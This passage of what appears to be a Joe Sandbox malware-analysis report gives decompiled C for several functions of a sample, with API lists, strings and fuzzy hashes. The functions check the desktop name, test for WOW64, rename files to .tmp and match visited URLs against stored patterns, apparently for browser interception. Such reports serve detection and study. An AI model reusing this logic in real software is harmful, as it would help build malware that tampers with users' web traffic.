				if( *0x12dd320 == 0) {
					_t16 = 2;
					L012B15E6(_t16, 0x12dd320);
					L012B164F(0x12dd528, 0x12dd320, 0xffffffff);
					_t2 = PathRemoveFileSpecW(0x12dd528);
				}
				if(_t9 != 0) {
					L012B164F(_t9, 0x12dd320, 0xffffffff);
					_t2 = PathRenameExtensionW(_t9, L".tmp");
				}
				if(_a4 != 0) {
					_t29 =  *0x12dc9fc - 1; // 0x0
					if(_t29 > 0) {
						L012B17E4(0x12dd528, 0);
						L012B1BAE(0x12dd528, 1, 1);
						_t2 = GetFileAttributesW(0x12dd320);
						if(_t2 != 0xffffffff) {
							return L012B1BAE(0x12dd320, 1, 1);
						}
					}
				}
				return _t2;
			}

0x012c868e
0x012c8699
0x012c86a5
0x012c86ab
0x012c86ac
0x012c86b7
0x012c86bd
0x012c86bd
0x012c86c5
0x012c86cd
0x012c86d8
0x012c86d8
0x012c86e3
0x012c86e8
0x012c86ee
0x012c86f4
0x012c86fe
0x012c8704
0x012c870d
0x00000000
0x012c8714
0x012c870d
0x012c86ee
0x012c871c

APIs

PathRemoveFileSpecW.SHLWAPI(012DD528,000000FF,?,00000000,00000000,012C8E88,00000001,00020000,?,00A00000,00020000,?,00000004), ref: 012C86BD
PathRenameExtensionW.SHLWAPI(00000000,.tmp,000000FF,?,00000000,00000000,012C8E88,00000001,00020000,?,00A00000,00020000,?,00000004), ref: 012C86D8
GetFileAttributesW.KERNEL32(012DD320,00000001,?,00000000,00000000,012C8E88,00000001,00020000,?,00A00000,00020000,?), ref: 012C8704

Strings

.tmp, xrefs: 012C86D2

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: FilePath$AttributesExtensionRemoveRenameSpec
String ID: .tmp
API String ID: 3957249617-2986845003
Opcode ID: e34507158a128c24c14e9cbf25d6e191e451203638d2bec313b8803837aad80f
Instruction ID: 840cfe1668938a5a1ef01c1ca7f118960b9837811a7c0e10cec50020fd79c4ec
Opcode Fuzzy Hash: e34507158a128c24c14e9cbf25d6e191e451203638d2bec313b8803837aad80f
Instruction Fuzzy Hash: E9012611F2055117D6252B7DBCD8B7F598B5BD0A74B68C32DF326931C8DFA4482B4354

Uniqueness

Uniqueness Score: -1.00%

Function 012CEFBC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012CEFBC() {
				long _v8;
				char _v108;
				void _v208;
				void* __esi;
				void* _t8;
				void* _t10;

				_t8 = GetThreadDesktop(GetCurrentThreadId());
				if(_t8 != 0) {
					_t8 = GetUserObjectInformationW(_t8, 2,  &_v208, 0x64,  &_v8);
					if(_t8 != 0 && _v8 == 0x4e) {
						L012B137F(0x2937498d,  &_v108, 0);
						_t8 = L012B1735( &_v208,  &_v108, 0x4c);
						if(_t8 == 0) {
							_t10 = E012CEB9B(0x12dd838, _t8);
							if(_t10 == 0) {
								_t10 = E012CEDF6(0x12dd838, 0);
							} else {
								 *0x12dc738 =  *0x12dc738 | 0x00000004;
							}
							return _t10;
						}
					}
				}
				return _t8;
			}

0x012cefcc
0x012cefd4
0x012cefe6
0x012cefee
0x012cf000
0x012cf010
0x012cf017
0x012cf020
0x012cf027
0x012cf034
0x012cf029
0x012cf029
0x012cf029
0x00000000
0x012cf039
0x012cf017
0x012cefee
0x012cf03b

APIs

GetCurrentThreadId.KERNEL32 ref: 012CEFC5
GetThreadDesktop.USER32(00000000), ref: 012CEFCC
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 012CEFE6

Part of subcall function 012CEB9B: TlsAlloc.KERNEL32 ref: 012CEBB0

Strings

N, xrefs: 012CEFF0

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Thread$AllocCurrentDesktopInformationObjectUser
String ID: N
API String ID: 454308152-1130791706
Opcode ID: 7b41a389e42c36c4384fca0c58914449f860d6c5055fbc2c33f19bd98c6df68b
Instruction ID: ce125672c43c98c78e55c39d1a561252f1eec32c64208f41f34985706c92c5be
Opcode Fuzzy Hash: 7b41a389e42c36c4384fca0c58914449f860d6c5055fbc2c33f19bd98c6df68b
Instruction Fuzzy Hash: AB01807492530696FB34D794DE4AFE93B3D9B11F85F00425CE70E970C8EA705509C761

Uniqueness

Uniqueness Score: -1.00%

Function 012B4FDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E012B4FDD(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t7;
				signed int _t8;
				void* _t12;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t12 = __ecx;
				_t7 = GetModuleHandleW(L"kernel32.dll");
				if(_t7 == 0) {
					L4:
					_t8 = _t7 & 0xffffff00 | _v8 != 0x00000000;
				} else {
					_t7 = GetProcAddress(_t7, "IsWow64Process");
					if(_t7 == 0) {
						goto L4;
					} else {
						_t7 = _t7->i(_t12,  &_v8);
						if(_t7 != 0) {
							goto L4;
						} else {
							_t8 = 0;
						}
					}
				}
				return _t8;
			}

0x012b4fe0
0x012b4fe1
0x012b4feb
0x012b4fed
0x012b4ff5
0x012b5016
0x012b501a
0x012b4ff7
0x012b4ffd
0x012b5005
0x00000000
0x012b5007
0x012b500c
0x012b5010
0x00000000
0x012b5012
0x012b5012
0x012b5012
0x012b5010
0x012b5005
0x012b501f

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 012B4FED
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 012B4FFD

Strings

IsWow64Process, xrefs: 012B4FF7
kernel32.dll, xrefs: 012B4FE6

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32.dll
API String ID: 1646373207-3024904723
Opcode ID: 5304cb1616b57ce374824a1f597803b686adad29b14a271ddf9baac2fbef436f
Instruction ID: 0bd9934c129047e80f2cfc76fbc95cd36072a07e57f13d1259eaf20c4e07b398
Opcode Fuzzy Hash: 5304cb1616b57ce374824a1f597803b686adad29b14a271ddf9baac2fbef436f
Instruction Fuzzy Hash: 70E09231531212B7EF345A66DC0ABDE36AC9F05799F000858B501A6080EAB8C645E6A2

Uniqueness

Uniqueness Score: -1.00%

Function 012D1C95 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E012D1C95(void* __ecx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				void* _t9;
				int _t10;

				_push(__ecx);
				if(_a12 == 0x64 || _a12 == 0x33) {
					EnterCriticalSection(0x12dda14);
					_t10 = E012D104F(_a4);
					_v8 = _t10;
					if(_v8 != 0xffffffff) {
						_t10 = SetEvent( *( *0x12dda2c + 4 + _v8 * 0x24));
					}
					LeaveCriticalSection(0x12dda14);
					return _t10;
				}
				return _t9;
			}

0x012d1c98
0x012d1c9d
0x012d1caa
0x012d1cb3
0x012d1cb8
0x012d1cbf
0x012d1cd1
0x012d1cd1
0x012d1cdc
0x00000000
0x012d1cdc
0x012d1ce3

APIs

EnterCriticalSection.KERNEL32(012DDA14), ref: 012D1CAA
SetEvent.KERNEL32(000000FF), ref: 012D1CD1
LeaveCriticalSection.KERNEL32(012DDA14), ref: 012D1CDC

Strings

3, xrefs: 012D1C9F

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: 3
API String ID: 3094578987-1842515611
Opcode ID: 1a8c61eca5913abef2ca89e1e2877efba7ea5db526fbea16d535c91253a4d131
Instruction ID: b494c68b7a0976ba0964255b8a9c7b96109d171fb7cd2ad7a3bb2ca27604fd8d
Opcode Fuzzy Hash: 1a8c61eca5913abef2ca89e1e2877efba7ea5db526fbea16d535c91253a4d131
Instruction Fuzzy Hash: 71F0E53091020FDFCB20DFB8E94D81C7B74FB04315710C128E2129B494CB70CA21CB12

Uniqueness

Uniqueness Score: -1.00%

Function 012C565A Relevance: 6.4, APIs: 4, Instructions: 385
networkCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E012C565A(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t129;
				char* _t130;
				struct _CRITICAL_SECTION* _t138;
				struct _CRITICAL_SECTION* _t147;
				intOrPtr _t148;
				void* _t149;
				struct _CRITICAL_SECTION* _t155;
				void* _t156;
				void* _t161;
				intOrPtr _t162;
				intOrPtr* _t164;
				intOrPtr _t171;
				struct _CRITICAL_SECTION _t178;
				void* _t181;
				void* _t182;
				void* _t183;
				int _t187;
				void* _t189;
				struct _CRITICAL_SECTION* _t192;
				void* _t195;
				struct _CRITICAL_SECTION* _t199;
				signed int _t200;
				void* _t202;
				void* _t206;
				void* _t211;
				void* _t212;
				void* _t219;
				void* _t220;
				intOrPtr _t221;
				char _t224;
				void* _t225;
				void* _t226;
				void* _t229;
				void* _t230;
				void* _t232;
				void* _t238;
				void* _t241;
				struct _CRITICAL_SECTION* _t242;
				void* _t245;
				void* _t247;
				intOrPtr _t250;
				char* _t251;
				void* _t264;
				void* _t273;
				void* _t275;
				void* _t277;
				void* _t278;

				_t275 = _t277 - 0x78;
				_t278 = _t277 - 0x21c;
				_t269 = 0x12dd074;
				_t199 = 0;
				_t273 = __ecx;
				 *(_t275 + 0x70) = 0;
				 *((char*)(_t275 + 0x77)) = 0xff;
				EnterCriticalSection(0x12dd074);
				_t208 =  *0x12dd090;
				if( *0x12dd090 != 0 &&  *0x12dd08c != 0) {
					_t266 =  *(_t273 + 8);
					if(L012B1622(_t208,  *(_t273 + 8),  *(_t273 + 0xc), 0) != 0) {
						_t192 = L012B1816(_t191, _t266, _t273);
						 *(_t275 + 0x6c) = _t192;
						if(_t192 != 0) {
							_push( *0x12dd08c);
							_t267 = _t275 + 0x6c;
							_t241 = 4;
							_t195 = L012B14A6(_t241, _t275 + 0x6c);
							_t242 =  *(_t275 + 0x6c);
							if(_t195 == 0) {
								L012B1933(_t242);
								_t242 = 0;
							}
							L012B1A32(_t242, _t267);
						}
						L012B1933( *0x12dd08c);
						L012B1933( *0x12dd090);
						 *0x12dd08c = _t199;
						 *0x12dd090 = _t199;
					}
				}
				LeaveCriticalSection(_t269);
				_t209 =  *((intOrPtr*)(_t273 + 0x40));
				_t287 =  *((intOrPtr*)(_t273 + 0x40)) - _t199;
				if( *((intOrPtr*)(_t273 + 0x40)) == _t199) {
					L36:
					if(( *(_t275 + 0x70) & 0x00000001) == 0) {
						_t258 =  *((intOrPtr*)(_t273 + 0x44));
						if( *((intOrPtr*)(_t273 + 0x44)) != _t199) {
							_push(_t199);
							_push( *(_t273 + 0xc));
							_push( *(_t273 + 8));
							_t232 = 3;
							if(L012B1997(_t232, _t258, _t273) != 0) {
								 *(_t275 + 0x70) =  *(_t275 + 0x70) | 0x00000001;
							}
						}
					}
					if( *(_t273 + 0x20) >= 0x21) {
						_t230 = 0x11;
						L012B165E(_t230, _t275 + 0x28);
						if(L012B1735( *((intOrPtr*)(_t273 + 0x1c)), _t275 + 0x28, 0x21) == 0) {
							_t171 =  *((intOrPtr*)( *((intOrPtr*)(_t273 + 0x1c)) + 0x21));
							if(_t171 == 0x3b || _t171 == 0) {
								 *(_t275 + 0x70) =  *(_t275 + 0x70) | 0x00000010;
							}
						}
					}
					_t129 =  *((intOrPtr*)(_t273 + 0x2c));
					 *(_t275 + 0x68) = _t199;
					if(_t129 == _t199 ||  *_t129 == _t199) {
						L50:
						_t130 =  *((intOrPtr*)(_t273 + 0x34));
						__eflags = _t130 - _t199;
						if(_t130 == _t199) {
							goto L57;
						}
						__eflags =  *_t130;
						if( *_t130 == 0) {
							goto L57;
						}
						_t226 = 0x13;
						L012B1479(_t226, _t275 - 0x38);
						_t161 = L012B151E(_t275 + 0x68, _t275 - 0x38,  *((intOrPtr*)(_t273 + 0x34)));
						_t278 = _t278 + 0xc;
						goto L53;
					} else {
						_t164 =  *((intOrPtr*)(_t273 + 0x30));
						if(_t164 == _t199 ||  *_t164 == _t199) {
							goto L50;
						} else {
							_t229 = 0x12;
							L012B1479(_t229, _t275 - 0xa0);
							_push( *((intOrPtr*)(_t273 + 0x30)));
							_t161 = L012B151E(_t275 + 0x68, _t275 - 0xa0,  *((intOrPtr*)(_t273 + 0x2c)));
							_t278 = _t278 + 0x10;
							L53:
							if(_t161 > _t199) {
								_t162 = L012B1523(_t161,  *(_t275 + 0x68), _t161 + _t161, _t273);
								if( *0x12dd094 != _t162) {
									_t64 = _t275 + 0x70;
									 *_t64 =  *(_t275 + 0x70) | 0x00000020;
									__eflags =  *_t64;
									 *0x12dd094 = _t162;
								} else {
									L012B1933( *(_t275 + 0x68));
									 *(_t275 + 0x68) = _t199;
								}
							}
							L57:
							if( *((char*)(_t275 + 0x77)) != 0xff) {
								__eflags =  *((char*)(_t275 + 0x77)) - 1;
								if( *((char*)(_t275 + 0x77)) != 1) {
									L64:
									if(( *(_t275 + 0x70) & 0x00000008) == 0) {
										L94:
										L012B1933( *(_t275 + 0x68));
										_t200 =  *(_t275 + 0x70);
										if((_t200 & 0x00000001) == 0) {
											if(E012C532C(_t200, _t269, _t273) != 0) {
												_t200 = _t200 | 0x00000002;
											}
											if((_t200 & 0x00000010) != 0 && E012C4930(_t273) != 0) {
												_t200 = _t200 | 0x00000004;
											}
										}
										return _t200;
									}
									_t243 =  *(_t273 + 0x28);
									_t202 = 0;
									if( *(_t273 + 0x28) != 0) {
										__eflags =  *(_t275 + 0x70) & 0x00000010;
										if(( *(_t275 + 0x70) & 0x00000010) == 0) {
											__eflags =  *(_t273 + 0x20);
											if( *(_t273 + 0x20) != 0) {
												L93:
												 *(_t275 + 0x70) =  *(_t275 + 0x70) & 0xfffffff7;
												goto L94;
											}
											_t211 = 0xd;
											L012B165E(_t211, _t275 + 0x4c);
											_push(9);
											_t212 = _t275 + 0x4c;
											L78:
											_pop(_t245);
											 *(_t275 + 0x6c) = L012B12A8(_t212, _t245);
											L79:
											if( *(_t275 + 0x6c) == 0) {
												goto L93;
											}
											E012B1A50(_t275 + 0x64);
											_t138 = L012B1596( *(_t273 + 8),  *(_t273 + 0xc));
											_t269 = _t138;
											if(_t138 != 0) {
												_t247 = 0x3c;
												L012B19F6(_t275 - 0x30, _t247);
												 *(_t275 - 0x30) = 0x3c;
												if(InternetCrackUrlA( *(_t273 + 8),  *(_t273 + 0xc), 0, _t275 - 0x30) == 1) {
													_t219 = 0xb;
													L012B1479(_t219, _t275 - 0x9c);
													_t220 = 0xe;
													L012B1479(_t220, _t275 + 0x34);
													_t147 =  *(_t275 + 0x68);
													 *(_t275 + 0x60) = 0x12d8a44;
													if(_t147 != 0) {
														 *(_t275 + 0x60) = _t147;
													}
													_t250 =  *((intOrPtr*)(_t275 + 0x64));
													if(_t250 == 0) {
														_t250 = 0x12d8a48;
													}
													_t148 =  *((intOrPtr*)(_t273 + 0x10));
													_t221 = 0x12d8a4c;
													if(_t148 != 0) {
														_t221 = _t148;
													}
													_t149 = _t275 + 0x34;
													if(( *(_t275 + 0x70) & 0x00000001) == 0) {
														_t149 = 0x12d8a50;
													}
													_push( *(_t275 + 0x6c));
													_push( *(_t275 + 0x60));
													_push(_t250);
													_push(_t221);
													_push(_t149);
													_t202 = L012B171C((0 |  *((intOrPtr*)(_t275 - 0x24)) == 0x00000004) + 0xb, _t269, 0, _t275 - 0x9c, _t269);
												}
												L012B1933(_t269);
											}
											L012B1933( *((intOrPtr*)(_t275 + 0x64)));
											L012B1933( *(_t275 + 0x6c));
											if(_t202 != 0) {
												goto L94;
											} else {
												goto L93;
											}
										}
										_t155 = L012B12A8( *((intOrPtr*)(_t273 + 0x24)), _t243);
										 *(_t275 + 0x6c) = _t155;
										__eflags = _t155;
										if(_t155 == 0) {
											goto L93;
										}
										_t156 = 0;
										__eflags =  *(_t273 + 0x28);
										if( *(_t273 + 0x28) <= 0) {
											goto L79;
										} else {
											goto L70;
										}
										do {
											L70:
											_t251 = _t156 +  *(_t275 + 0x6c);
											_t224 =  *_t251;
											__eflags = _t224 - 0x26;
											if(_t224 != 0x26) {
												__eflags = _t224 - 0x2b;
												if(_t224 == 0x2b) {
													 *_t251 = 0x20;
												}
											} else {
												 *_t251 = 0xa;
											}
											_t156 = _t156 + 1;
											__eflags = _t156 -  *(_t273 + 0x28);
										} while (_t156 <  *(_t273 + 0x28));
										goto L79;
									}
									_t225 = 0xc;
									L012B165E(_t225, _t275 + 0x58);
									_push(7);
									_t212 = _t275 + 0x58;
									goto L78;
								}
								L63:
								 *(_t275 + 0x70) =  *(_t275 + 0x70) | 0x00000008;
								goto L64;
							}
							if( *((char*)(_t273 + 0x18)) != 1 ||  *(_t273 + 0x28) <= _t199) {
								if(( *(_t275 + 0x70) & 0x00000020) == 0) {
									goto L64;
								}
							}
							goto L63;
						}
					}
				}
				_t269 = L012B1AAA(_t209, _t287, 0x10000000, _t275 + 0x64);
				 *(_t275 + 0x60) = _t269;
				if(L012B1A5A(_t269,  *((intOrPtr*)(_t275 + 0x64))) == 0) {
					L35:
					L012B1933( *(_t275 + 0x60));
					_t199 = 0;
					goto L36;
				} else {
					goto L10;
				}
				do {
					L10:
					if( *((char*)(_t269 + 1)) == 0) {
						goto L34;
					}
					_t178 =  *_t269;
					if(_t178 == 0x21) {
						L20:
						__eflags = _t269;
						L21:
						if(L012B1622(_t269,  *(_t273 + 8),  *(_t273 + 0xc), 0) == 0) {
							goto L34;
						}
						_t181 = _t206;
						if(_t181 == 0) {
							 *((char*)(_t275 + 0x77)) = 0;
							L33:
							if(_t206 != 2) {
								goto L35;
							}
							goto L34;
						}
						_t182 = _t181 - 1;
						if(_t182 == 0) {
							L28:
							 *((char*)(_t275 + 0x77)) = 1;
							goto L33;
						}
						_t183 = _t182 - 1;
						if(_t183 == 0) {
							_t264 = 0x3c;
							L012B19F6(_t275 + 0x10, _t264);
							 *((intOrPtr*)(_t275 + 0x20)) = _t275 - 0x1a4;
							 *(_t275 + 0x10) = 0x3c;
							 *(_t275 + 0x24) = 0x103;
							_t187 = InternetCrackUrlA( *(_t273 + 8),  *(_t273 + 0xc), 0, _t275 + 0x10);
							__eflags = _t187 - 1;
							if(_t187 == 1) {
								__eflags =  *(_t275 + 0x24);
								if( *(_t275 + 0x24) > 0) {
									_t238 = 0x14;
									E012B1208(_t238, _t275 - 0x1a4);
								}
							}
							goto L33;
						}
						_t189 = _t183 - 1;
						if(_t189 == 0 || _t189 == 1) {
							 *(_t275 + 0x70) =  *(_t275 + 0x70) | 0x00000001;
							goto L28;
						} else {
							goto L33;
						}
					}
					if(_t178 == 0x2d) {
						goto L20;
					}
					if(_t178 == 0x40) {
						goto L20;
					}
					if(_t178 == 0x5e) {
						_t206 = 4;
						goto L20;
					} else {
						_t206 = 0;
						goto L21;
					}
					L34:
					_t269 = L012B1717(_t269, 1);
				} while (_t269 != 0);
				goto L35;
			}

0x012c565b
0x012c565f
0x012c5668
0x012c566d
0x012c5670
0x012c5672
0x012c5675
0x012c5679
0x012c567f
0x012c5687
0x012c5691
0x012c569f
0x012c56a1
0x012c56a6
0x012c56ab
0x012c56ad
0x012c56b3
0x012c56b8
0x012c56b9
0x012c56be
0x012c56c3
0x012c56c5
0x012c56ca
0x012c56ca
0x012c56cc
0x012c56cc
0x012c56d7
0x012c56e2
0x012c56e7
0x012c56ed
0x012c56ed
0x012c569f
0x012c56f4
0x012c56fa
0x012c56fd
0x012c56ff
0x012c5805
0x012c5809
0x012c580b
0x012c5810
0x012c5812
0x012c5813
0x012c5816
0x012c581b
0x012c5823
0x012c5825
0x012c5825
0x012c5823
0x012c5810
0x012c582d
0x012c5834
0x012c5835
0x012c5849
0x012c584e
0x012c5853
0x012c5859
0x012c5859
0x012c5853
0x012c5849
0x012c585d
0x012c5860
0x012c5865
0x012c58a1
0x012c58a1
0x012c58a4
0x012c58a6
0x00000000
0x00000000
0x012c58a8
0x012c58ab
0x00000000
0x00000000
0x012c58b2
0x012c58b3
0x012c58c3
0x012c58c8
0x00000000
0x012c586c
0x012c586c
0x012c5871
0x00000000
0x012c5878
0x012c5880
0x012c5881
0x012c5886
0x012c5897
0x012c589c
0x012c58cb
0x012c58cd
0x012c58d5
0x012c58e0
0x012c58ef
0x012c58ef
0x012c58ef
0x012c58f3
0x012c58e2
0x012c58e5
0x012c58ea
0x012c58ea
0x012c58e0
0x012c58f8
0x012c58fc
0x012c5911
0x012c5915
0x012c591b
0x012c591f
0x012c5a91
0x012c5a94
0x012c5a99
0x012c5a9f
0x012c5aa8
0x012c5aaa
0x012c5aaa
0x012c5ab0
0x012c5abd
0x012c5abd
0x012c5ab0
0x012c5ac9
0x012c5ac9
0x012c5925
0x012c5928
0x012c592c
0x012c5940
0x012c5944
0x012c5982
0x012c5986
0x012c5a8d
0x012c5a8d
0x00000000
0x012c5a8d
0x012c5991
0x012c5992
0x012c5997
0x012c5999
0x012c599c
0x012c599c
0x012c59a2
0x012c59a5
0x012c59a9
0x00000000
0x00000000
0x012c59b2
0x012c59bd
0x012c59c2
0x012c59c6
0x012c59ce
0x012c59d2
0x012c59e0
0x012c59f3
0x012c59fd
0x012c59fe
0x012c5a08
0x012c5a09
0x012c5a0e
0x012c5a11
0x012c5a1a
0x012c5a1c
0x012c5a1c
0x012c5a1f
0x012c5a24
0x012c5a26
0x012c5a26
0x012c5a2b
0x012c5a2e
0x012c5a35
0x012c5a37
0x012c5a37
0x012c5a3d
0x012c5a40
0x012c5a42
0x012c5a42
0x012c5a47
0x012c5a4a
0x012c5a4d
0x012c5a4e
0x012c5a4f
0x012c5a70
0x012c5a70
0x012c5a74
0x012c5a74
0x012c5a7c
0x012c5a84
0x012c5a8b
0x00000000
0x00000000
0x00000000
0x00000000
0x012c5a8b
0x012c5949
0x012c594e
0x012c5951
0x012c5953
0x00000000
0x00000000
0x012c5959
0x012c595b
0x012c595e
0x00000000
0x00000000
0x00000000
0x00000000
0x012c5960
0x012c5960
0x012c5963
0x012c5966
0x012c5968
0x012c596b
0x012c5972
0x012c5975
0x012c5977
0x012c5977
0x012c596d
0x012c596d
0x012c596d
0x012c597a
0x012c597b
0x012c597b
0x00000000
0x012c5980
0x012c5933
0x012c5934
0x012c5939
0x012c593b
0x00000000
0x012c593b
0x012c5917
0x012c5917
0x00000000
0x012c5917
0x012c5902
0x012c590d
0x00000000
0x00000000
0x012c590f
0x00000000
0x012c5902
0x012c5871
0x012c5865
0x012c571b
0x012c571f
0x012c5729
0x012c57fb
0x012c57fe
0x012c5803
0x00000000
0x00000000
0x00000000
0x00000000
0x012c572f
0x012c572f
0x012c5733
0x00000000
0x00000000
0x012c5739
0x012c573d
0x012c575d
0x012c575d
0x012c575e
0x012c576f
0x00000000
0x00000000
0x012c5774
0x012c5777
0x012c57de
0x012c57e2
0x012c57e5
0x00000000
0x00000000
0x00000000
0x012c57e5
0x012c5779
0x012c577a
0x012c5789
0x012c5789
0x00000000
0x012c5789
0x012c577c
0x012c577d
0x012c5791
0x012c5795
0x012c57a0
0x012c57ac
0x012c57b6
0x012c57bd
0x012c57c3
0x012c57c6
0x012c57c8
0x012c57cc
0x012c57d6
0x012c57d7
0x012c57d7
0x012c57cc
0x00000000
0x012c57c6
0x012c577f
0x012c5780
0x012c5785
0x00000000
0x00000000
0x00000000
0x00000000
0x012c5780
0x012c5741
0x00000000
0x012c5757
0x012c5745
0x00000000
0x012c5753
0x012c5749
0x012c574f
0x00000000
0x012c574b
0x012c574b
0x00000000
0x012c574b
0x012c57e7
0x012c57f1
0x012c57f3
0x00000000

APIs

EnterCriticalSection.KERNEL32(012DD074), ref: 012C5679
LeaveCriticalSection.KERNEL32(012DD074), ref: 012C56F4
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 012C57BD
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 012C59EA

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CrackCriticalInternetSection$EnterLeave
String ID:
API String ID: 1059969152-0
Opcode ID: f80556386fc87d7aab2439d5efaeec25caf1c7dc525c270d41b12572d70b5173
Instruction ID: e49618b7750170fa0384dd95b8283ea785bd577534578bd01b4d3305bc28dc23
Opcode Fuzzy Hash: f80556386fc87d7aab2439d5efaeec25caf1c7dc525c270d41b12572d70b5173
Instruction Fuzzy Hash: 3BD1CF30B2034A8FEB25DF28E890BEA3BA6BF45750F14471DEB5687191DB70E985CB40

Uniqueness

Uniqueness Score: -1.00%

Function 012B8F58 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E012B8F58(void* __ecx, intOrPtr __edx) {
				signed int _v5;
				char _v6;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _t46;
				char _t47;
				char* _t52;
				char _t59;
				void* _t67;
				void* _t69;
				void* _t70;
				intOrPtr _t71;
				void* _t73;

				_t59 = 0;
				_t71 = __edx;
				_v20 = __edx;
				_t70 = __ecx;
				_v16 = 0;
				_v6 = 0;
				_v12 = 0;
				if(__edx <= 0) {
					L33:
					return _v12 - _t59 + _t71;
				} else {
					goto L1;
				}
				do {
					L1:
					if(_v16 == 0 ||  *((char*)(_t59 + _t70)) != 0x3e) {
						_t46 =  *((intOrPtr*)(_t59 + _t70));
						if(_t46 != 0x3c) {
